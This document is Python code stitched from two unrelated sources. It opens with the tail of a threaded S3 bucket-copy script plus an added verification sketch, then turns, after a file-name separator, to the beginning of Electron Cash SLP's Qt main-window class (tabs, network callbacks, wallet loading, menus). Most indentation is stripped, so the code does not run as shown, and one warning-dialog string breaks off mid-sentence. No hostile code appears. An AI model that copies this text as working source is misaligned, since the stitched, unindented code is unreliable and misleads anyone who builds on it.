client_config = botocore.config.Config(
max_pool_connections=args.max_concurrency)
transfer_config = boto3.s3.transfer.TransferConfig(
multipart_threshold=8 * 1024 * 1024,
multipart_chunksize=8 * 1024 * 1024,
max_concurrency=args.max_concurrency,
num_download_attempts=5,
max_io_queue=100,
io_chunksize=256 * 1024)
client = session.client('s3', config=client_config)
else:
s3 = session.resource('s3')
client = session.client('s3')
count = 0
while True:
prefix = tasks.get()
# HOWTO: list objects
response = s3_client.list_objects_v2(
Bucket=src_bucket.name,
Prefix=prefix) # Important: using prefix to limit listing
for content in response['Contents']:
key = content['Key']
trace('thread %d copy object: s3://%s/%s' % \
(thread_id, src_bucket.name, key))
if not args.dryrun:
if args.optimal:
client.copy(
CopySource={'Bucket': src_bucket.name, 'Key': key},
Bucket=dst_bucket.name, Key=key,
Config=transfer_config)
else:
obj = s3.Object(dst_bucket.name, key)
obj.copy_from(
CopySource={'Bucket': src_bucket.name, 'Key': key},
)
count += 1
copied_objects[thread_id] = count
tasks.task_done()
timing_start()
existing_prefixes = []
for prefix in string.ascii_lowercase + string.digits:
# HOWTO: use prefix to restrict listing objects
response = s3_client.list_objects_v2(
Bucket=src_bucket.name,
Prefix=prefix, # important: only list object with specific prefix
MaxKeys=1) # NOTE: MaxKeys=1 since we only test object existence
if response['KeyCount'] > 0:
existing_prefixes.append(prefix)
debug('existing prefixes: %s' % existing_prefixes)
for i in xrange(args.threads_num):
t = threading.Thread(target=copy_objects_by_thread, args=(i, copied_objects))
t.daemon = True
t.start()
for prefix in existing_prefixes:
tasks.put(prefix)
tasks.join()
for i in xrange(args.threads_num):
info('thread %d copied %d objects' % (i, copied_objects[i]))
timing_stop('copied %d objects by %d threads' % (sum(copied_objects), args.threads_num))
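# Optional verification sketch (an editorial addition, not part of the original
# example flow): count the objects in both buckets with a list_objects_v2
# paginator and warn if the totals differ after the copy.
def count_objects(bucket_name):
    total = 0
    paginator = s3_client.get_paginator('list_objects_v2')
    for page in paginator.paginate(Bucket=bucket_name):
        total += page.get('KeyCount', 0)
    return total
if not args.dryrun:
    src_count = count_objects(src_bucket.name)
    dst_count = count_objects(dst_bucket.name)
    info('verification: %d source objects, %d destination objects' % (src_count, dst_count))
    if src_count != dst_count:
        warning('object counts differ; some copies may have failed')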
|
main_window.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import sys, time, threading
import os, json, traceback
import shutil
import csv
from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal
import base64
from functools import partial
from collections import OrderedDict
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash import keystore, get_config
from electroncash.address import Address, ScriptOutput
from electroncash.bitcoin import COIN, TYPE_ADDRESS, TYPE_SCRIPT
from electroncash import networks
from electroncash.plugins import run_hook
from electroncash.i18n import _, ngettext, pgettext
from electroncash.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, format_satoshis_plain_nofloat,
NotEnoughFunds, NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp, ExcessiveFee,
UserCancelled, InvalidPassword, bh2u, bfh,
format_fee_satoshis, Weak, print_error)
import electroncash.web as web
from electroncash import Transaction
from electroncash import util, bitcoin, commands
from electroncash import paymentrequest
from electroncash.wallet import Multisig_Wallet, sweep_preparations
try:
from electroncash.plot import plot_history
except:
plot_history = None
import electroncash.web as web
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit, BTCSatsByteEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .popup_widget import ShowPopupLabel, KillPopupLabel, PopupWidget
from .util import *
import electroncash.slp as slp
from electroncash.slp_coinchooser import SlpCoinChooser
from electroncash.slp_checker import SlpTransactionChecker
from .amountedit import SLPAmountEdit
from electroncash.util import format_satoshis_nofloat
from .slp_create_token_genesis_dialog import SlpCreateTokenGenesisDialog
from .bfp_download_file_dialog import BfpDownloadFileDialog
from .bfp_upload_file_dialog import BitcoinFilesUploadDialog
try:
# pre-load QtMultimedia at app start, if possible
# this is because lazy-loading it from within Python
# callbacks led to crashes on Linux, likely due to
# bugs in PyQt5 (crashes wouldn't happen when testing
# with PySide2!).
from PyQt5.QtMultimedia import QCameraInfo
del QCameraInfo # defensive programming: not always available so don't keep name around
except ImportError as e:
pass # we tried to pre-load it, failure is ok; camera just won't be available
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(Qt.PointingHandCursor)
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electroncash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
# Note: self.clean_up_connections automatically detects signals named XXX_signal and disconnects them on window close.
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
cashaddr_toggled_signal = pyqtSignal()
history_updated_signal = pyqtSignal()
labels_updated_signal = pyqtSignal() # note this signal occurs when an explicit update_labels() call happens. Interested GUIs should also listen for history_updated_signal as well which also indicates labels may have changed.
on_timer_signal = pyqtSignal() # functions wanting to be executed from timer_actions should connect to this signal, preferably via Qt.DirectConnection
    status_icon_dict = dict() # app-global cache of "status_*" -> QIcon instances (for update_status() speedup)
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.wallet = wallet
self.config = config = gui_object.config
self.non_slp_wallet_warning_shown = False
self.force_use_single_change_addr = _('Change addresses behavior is not customizable for SLP wallets') if self.is_slp_wallet else False
if self.force_use_single_change_addr and not self.wallet.use_change:
self.wallet.use_change = True
self.wallet.storage.put('use_change', self.wallet.use_change)
self.network = gui_object.daemon.network
self.network.slp_validity_signal = self.gui_object.slp_validity_signal
self.network.slp_validation_fetch_signal = self.gui_object.slp_validation_fetch_signal
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
self.op_return_toolong = False
self.internalpluginsdialog = None
self.externalpluginsdialog = None
self.hardwarewalletdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self._tx_dialogs = Weak.Set()
self._slp_dialogs = Weak.Set()
self.tx_update_mgr = TxUpdateMgr(self) # manages network callbacks for 'new_transaction' and 'verified2', and collates GUI updates from said callbacks as a performance optimization
self.is_schnorr_enabled = self.wallet.is_schnorr_enabled # This is a function -- Support for plugins that may be using the 4.0.3 & 4.0.4 API -- this function used to live in this class, before being moved to Abstract_Wallet.
self.send_tab_opreturn_widgets, self.receive_tab_opreturn_widgets = [], [] # defaults to empty list
self._shortcuts = Weak.Set() # keep track of shortcuts and disable them on close
self.create_status_bar()
self.need_update = threading.Event()
self.labels_need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.slp_mgt_tab = self.create_slp_mgt_tab()
self.converter_tab = self.create_converter_tab()
self.slp_history_tab = self.create_slp_history_tab()
self.slp_token_id = None
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
# clears/inits the opreturn widgets
self.on_toggled_opreturn(bool(self.config.get('enable_opreturn')))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.converter_tab, QIcon(":icons/tab_converter.svg"), _("Address Converter"), "converter", True)
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
if self.is_slp_wallet:
add_optional_tab(tabs, self.slp_mgt_tab, QIcon(":icons/tab_slp_icon.png"), _("Tokens"), "tokens")
add_optional_tab(tabs, self.slp_history_tab, QIcon(":icons/tab_slp_icon.png"), _("SLP History"), "slp_history", True)
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.init_menubar()
wrtabs = Weak.ref(tabs) # We use a weak reference here to help along python gc of QShortcut children: prevent the lambdas below from holding a strong ref to self.
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+W"), self, self.close) )
        # Below is now added to the menu as Ctrl+R but we'll also support F5 like browsers do
self._shortcuts.add( QShortcut(QKeySequence("F5"), self, self.update_wallet) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() - 1)%wrtabs().count())) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() + 1)%wrtabs().count())) )
for i in range(tabs.count()):
self._shortcuts.add( QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs() and wrtabs().setCurrentIndex(i)) )
self.cashaddr_toggled_signal.connect(self.update_cashaddr_icon)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.gui_object.update_available_signal.connect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
self.history_list.setFocus(True)
self.slp_history_list.setFocus(True)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet()
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['blockchain_updated', 'wallet_updated',
'new_transaction', 'status', 'banner', 'verified2',
'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
self.gui_object.slp_validation_fetch_signal.connect(self.slp_validation_fetch_slot, Qt.QueuedConnection)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
@property
def is_slp_wallet(self):
return self.wallet.is_slp
_first_shown = True
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted() and self._first_shown:
self._first_shown = False
weakSelf = Weak.ref(self)
# do this immediately after this event handler finishes -- noop on everything but linux
QTimer.singleShot(0, lambda: weakSelf() and weakSelf().gui_object.lin_win_maybe_show_highdpi_caveat_msg(weakSelf()))
def update_token_type_combo(self):
self.token_type_combo.clear()
self.receive_token_type_combo.clear()
self.token_type_combo.addItem(QIcon(':icons/tab_coins.png'), 'None', None)
self.receive_token_type_combo.addItem(QIcon(':icons/tab_coins.png'), 'None', None)
try:
token_types = self.wallet.token_types
except AttributeError:
pass
else:
sorted_items = sorted(token_types.items(), key=lambda x:x[1]['name'])
for token_id, i in sorted_items:
if i['decimals'] != '?':
self.token_type_combo.addItem(QIcon(':icons/tab_slp_icon.png'),i['name'], token_id)
self.receive_token_type_combo.addItem(QIcon(':icons/tab_slp_icon.png'),i['name'], token_id)
def on_history(self, event, *args):
# NB: event should always be 'on_history'
if not args or args[0] is self.wallet:
self.new_fx_history_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_history(self):
if self.cleaned_up: return
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_quotes(self):
if self.cleaned_up: return
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def toggle_tab(self, tab, forceStatus = 0):
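        '''Show or hide an optional tab, persisting the new state in the config
        and updating the tab's View menu action text. See forceStatus values below.'''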
        # forceStatus = 0: toggle based on the current config setting
        # forceStatus = 1: force show
        # forceStatus = 2: force hide
if forceStatus==1:
show=True
elif forceStatus==2:
show=False
else:
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_format = _("Hide {tab_description}") if show else _("Show {tab_description}")
item_text = item_format.format(tab_description=tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window, *, raise_if_missing=False):
try:
self.tl_windows.remove(window)
except ValueError:
if raise_if_missing:
raise
''' Window not in list. Suppressing the exception by default makes
writing cleanup handlers easier. Doing it this way fixes #1707. '''
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self), self.wallet.basename())
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
# Issue #662, user got IO error.
# We want them to still get the error displayed to them.
pass
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
#self.print_error("on_network:", event, *args)
if event == 'wallet_updated':
if args[0] is self.wallet:
self.need_update.set()
elif event == 'blockchain_updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_update_mgr.notif_add(args) # added only if this wallet's tx
if args[1] is self.wallet:
self.network_signal.emit(event, args)
elif event == 'verified2':
self.tx_update_mgr.verif_add(args) # added only if this wallet's tx
elif event in ['status', 'banner', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
if self.cleaned_up: return
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'fee':
pass
elif event == 'new_transaction':
self.check_and_reset_receive_address_if_needed()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
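        '''Resolve the OpenAlias configured under the 'alias' key (if any) in a
        background thread, emitting alias_received_signal when the lookup completes.'''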
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
_gs_option_shown = False
_high_data_limit = 1048576 * 100 # 100 MB limit
_high_data_shown = False
def slp_validation_fetch_slot(self, total_bytes_received):
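        '''Slot for gui_object.slp_validation_fetch_signal. Asks once (app-wide)
        whether to enable SLP Graph Search, and separately warns once when
        validation downloads exceed _high_data_limit.'''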
key = 'slp_validator_graphsearch_enabled'
key2 = 'slp_validator_gs_did_nag_once_even_if_was_false'
key3 = 'slp_never_warn_on_high_data'
val, val2, val3 = self.config.get(key), self.config.get(key2), self.config.get(key3)
# This if conditional asks once app-wide. But it only asks if:
# - "gs enabled" key has never been configured (is None)
# *or*
# - "gs enabled" key is False (indicating user configured it to False)
# but it never asked before (we nag the user at least once even if off,
# basically).
if (not ElectrumWindow._gs_option_shown
and (val is None or (val is False and not val2))):
del val, val2
ElectrumWindow._gs_option_shown = True
self.config.set_key(key2, True) # turn off forced "ask at least once" mechanism
res, neverask_chk = self.question(
_("Speed up SLP validation using a Graph Search server?"),
title=_("SLP Graph Search"),
detail_text=_(
"SLP validation can use a Graph Search server, making it"
" blazingly fast. This does, however, mean that your client"
" contacts an additional server on the internet, sharing"
" with it a set of txids you are interested in knowing"
" more about.\n\n"
"Some extremely privacy-minded users may opt out of this"
" speedy facility in light of that fact, and choose to use"
" the older, slower method of simply relying on the"
" ElectronX servers to do SLP token validation.\n\n"
"If unsure what to answer now, you may always toggle this"
" facility on/off from the Network Dialog later."),
checkbox_text=_("Don't ask again"))
if res:
self.config.set_key(key, True)
elif neverask_chk:
# set to actual False rather than None to indicate we never
# want to be asked.
self.config.set_key(key, False)
elif (val3 is None or val3 is False) \
and total_bytes_received >= ElectrumWindow._high_data_limit \
and not ElectrumWindow._high_data_shown:
ElectrumWindow._high_data_shown = True
res, neverask_chk = self.question(
_("SLP Graph Search has downloaded 100 MB in data and will continue to download data."
"Disabling Graph Search would slow down the rate of downloading.\n\n"
"Continue using SLP Graph Search?"),
title=_("High Data Usage"),
detail_text=_(
"SLP validation can use a Graph Search server, making it"
" blazingly fast. This does, however, mean that your client"
" uses additional data and bandwidth to download"
" all of the transactions it needs to validate your tokens.\n\n"
"Disabling Graph Search will reduce the speed of "
"If unsure what to answer now, you may always toggle this"
" facility on/off from the Network Dialog later."),
checkbox_text=_("Don't ask again")
)
# TODO: This message should also be displayed based on ElectrumX validation data downloaded
if res is False:
self.config.set_key(key, False)
if neverask_chk:
# set to actual False rather than None to indicate we never
# want to be asked.
self.config.set_key(key3, True)
def load_wallet(self):
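        '''Complete wallet-dependent initialization: start the wallet's TaskThread,
        refresh all list views and menus, apply the SLP or non-SLP address format
        and tab visibility, and finally show the window.'''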
self.wallet.thread = TaskThread(self, self.on_error, name = self.wallet.diagnostic_name() + '/Wallet')
self.wallet.ui_emit_validity_updated = self.gui_object.slp_validity_signal.emit
self.wallet.ui_emit_validation_fetch = self.gui_object.slp_validation_fetch_signal.emit
self.update_recently_visited(self.wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
if self.is_slp_wallet:
self.slp_history_list.update()
self.token_list.update()
self.update_token_type_combo()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.tray.isVisible():
self.hide()
else:
self.show()
if self._is_invalid_testnet_wallet():
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
self._rebuild_history_action.setEnabled(False)
self._warn_if_invalid_testnet_wallet()
self.watching_only_changed()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
if self.is_slp_wallet:
self.toggle_cashaddr(2, True)
self.toggle_tab(self.slp_mgt_tab, 1)
self.toggle_tab(self.slp_history_tab, 1)
else:
self.toggle_cashaddr(1, True)
self.update_receive_address_widget()
self.address_list.update()
self.utxo_list.update()
self.slp_mgt_tab.update()
self.slp_history_tab.update()
self.update_cashaddr_icon()
run_hook('load_wallet', self.wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = '%s %s - %s' % (networks.net.TITLE,
self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin Cash with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoin Cash to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def _is_invalid_testnet_wallet(self):
if not networks.net.TESTNET:
return False
is_old_bad = False
xkey = ((hasattr(self.wallet, 'get_master_public_key') and self.wallet.get_master_public_key())
or None)
if xkey:
from electroncash.bitcoin import deserialize_xpub, InvalidXKeyFormat
try:
xp = deserialize_xpub(xkey)
except InvalidXKeyFormat:
is_old_bad = True
return is_old_bad
def _warn_if_invalid_testnet_wallet(self):
''' This was added after the upgrade from the bad xpub testnet wallets
to the good tpub testnet wallet format in version 3.3.6. See #1164.
We warn users if they are using the bad wallet format and instruct
them on how to upgrade their wallets.'''
is_old_bad = self._is_invalid_testnet_wallet()
if is_old_bad:
msg = ' '.join([
_("This testnet wallet has an invalid master key format."),
_("(Old versions of Electron Cash before 3.3.6 produced invalid testnet wallets)."),
'<br><br>',
_("In order to use this wallet without errors with this version of EC, please <b>re-generate this wallet from seed</b>."),
"<br><br><em><i>~SPV stopped~</i></em>"
])
self.show_critical(msg, title=_('Invalid Master Key'), rich_text=True)
return is_old_bad
def _warn_slp_prefers_slp_wallets_if_not_slp_wallet(self):
if not self.is_slp_wallet and not self.non_slp_wallet_warning_shown:
msg = '\n\n'.join([
_("WARNING: SLP Tokens Disabled."),
_("SLP tokens were detected in this older style wallet file and this version does not allow use of SLP tokens for your protection."),
_("Please install version 3.4.6 to create a new SLP wallet file and then transfer the tokens from this wallet file to the new 3.4.6 style wallet file."),
_("Why? This is because Electron Cash SLP versions 3.4.3 and later all include a significant security improvement for SLP tokens. That is, all standard wallet files created with 3.4.3 and later use BIP-44 key derivation path m/44'/245' to reduce the risk of burning SLP tokens. Taking no action could result in burning your tokens if this wallet's seed is imported into a non-SLP aware wallet."),
_('''If you're wondering "what do I have to do?":'''),
_("If you want to recover the SLP tokens in this wallet file you need to install version 3.4.6 of this software and follow the instructions provided above.")
])
self.show_warning(msg, title=_("SLP Tokens Detected in a Non-SLP Wallet"))
self.non_slp_wallet_warning_shown = True
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
if filename.lower().endswith('.txn'):
# they did File -> Open on a .txn, just do that.
self.do_process_from_file(fileName=filename)
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
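        '''Promote filename to the top of the recently-opened list (trimmed to 5
        existing files), save it to config, and rebuild the Open Recent menu with
        Ctrl+1..Ctrl+5 shortcuts.'''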
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent2 = []
for k in recent:
if os.path.exists(k):
recent2.append(k)
recent = recent2[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
gui_object = self.gui_object
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return self.gui_object.get_wallet_folder()
def new_wallet(self):
try:
full_path = self.gui_object.get_new_wallet_path()
except FileNotFoundError as e:
self.show_error(str(e))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = self.menuBar()
menubar.setObjectName(self.diagnostic_name() + ".QMenuBar")
destroyed_print_error(menubar)
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("Open &Recent"))
file_menu.addAction(_("&Open") + "...", self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore") + "...", self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy As") + "...", self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("&Delete") + "...", self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close).setShortcut(QKeySequence.Quit)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys, QKeySequence("Ctrl+I"))
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password") + "...", self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("Private Keys"))
self.private_keys_menu.addAction(_("&Sweep") + "...", self.sweep_key_dialog).setDisabled(True) # always disable in SLP for now
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import") + "...", self.do_import_privkey)
self.export_menu = self.private_keys_menu.addMenu(_("&Export"))
self.export_menu.addAction(_("&WIF Plaintext") + "...", self.export_privkeys_dialog)
self.export_menu.addAction(_("&BIP38 Encrypted") + "...", self.export_bip38_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses") + "...", self.import_addresses)
wallet_menu.addSeparator()
self._rebuild_history_action = wallet_menu.addAction(_("&Rebuild History") + "...", self.rebuild_history)
self._scan_beyond_gap_action = wallet_menu.addAction(_("Scan &More Addresses..."), self.scan_beyond_gap)
self._scan_beyond_gap_action.setEnabled(bool(self.wallet.is_deterministic() and self.network))
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import") + "...", self.do_import_labels)
labels_menu.addAction(_("&Export") + "...", self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("&Contacts"))
contacts_menu.addAction(_("&New") + "...", self.new_contact_dialog)
contacts_menu.addAction(_("Import") + "...", lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export") + "...", lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import") + "...", lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
#hist_menu.addAction(_("Plot"), self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction(_("Export") + "...", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("&Find"), self.toggle_search, QKeySequence("Ctrl+F"))
